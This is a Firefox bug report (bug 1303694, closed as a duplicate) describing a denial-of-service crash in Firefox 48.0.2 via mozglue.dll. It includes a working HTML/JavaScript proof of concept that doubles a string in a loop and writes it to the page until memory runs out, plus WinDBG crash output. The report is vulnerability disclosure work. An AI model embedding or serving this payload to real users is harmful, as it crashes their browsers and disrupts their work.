Closed
Bug 1303694
Opened 8 years ago
Closed 8 years ago
Firefox Browser 48.0.2 - (mozglue.dll) Denial Of Service Vulnerability
Categories: Firefox :: Untriaged, defect
RESOLVED DUPLICATE of bug 380223
People: Reporter: admin, Unassigned
Details
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160823121617
Steps to reproduce:
PoC:
<body onload="javascript:VulnerabilityLab();"></body>
<script>
function VulnerabilityLab() {
  var buffer = '\x41';
  // buffer roughly doubles on every pass, so memory is exhausted long before 1337 iterations
  for (var i = 0; i < 1337; i++) {
    buffer += buffer + '\x41';
    document.write('<html><marquee><h1>' + buffer + buffer);
  }
}
</script>
--- Debug Session Logs [WinDBG] ---
Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=5dee0a3e edx=00000000 esi=6e837466 edi=00ce70ce
eip=6e82efe5 esp=00ce7088 ebp=00ce70d4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mozilla Firefox\mozglue.dll -
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc int 3
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc int 3
6e82efe6 6a03 push 3
6e82efe8 c7050000000021000000 mov dword ptr ds:[0],21h
6e82eff2 ff151060836e call dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xf96 (6e836010)]
6e82eff8 50 push eax
6e82eff9 ff155c60836e call dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xfe2 (6e83605c)]
6e82efff cc int 3
mozglue!mozalloc_handle_oom:
6e82f000 55 push ebp
lmvm mozglue
start end module name
6e820000 6e83d000 mozglue (export symbols) C:\Program Files\Mozilla Firefox\mozglue.dll
Loaded symbol image file: C:\Program Files\Mozilla Firefox\mozglue.dll
Image path: C:\Program Files\Mozilla Firefox\mozglue.dll
Image name: mozglue.dll
Timestamp: Wed Aug 24 06:53:43 2016 (57BD2857)
CheckSum: 0001E87D
ImageSize: 0001D000
File version: 48.0.2.6079
Product version: 48.0.2.6079
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0000.04b0
CompanyName: Mozilla Foundation
ProductName: Firefox
InternalName: Firefox
OriginalFilename: mozglue.dll
ProductVersion: 48.0.2
FileVersion: 48.0.2
FileDescription: 48.0.2
LegalCopyright: License: MPL 2
LegalTrademarks: Mozilla
Comments: Mozilla
Actual results:
Opening the PoC code as HTML allows remote attackers to crash the Mozilla Firefox browser and Firefox OS via mozglue.dll.
Expected results:
The script loop exception should capture the process to protect against uncaught exceptions, BOFs, or other read/write access violations.
Updated 8 years ago
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE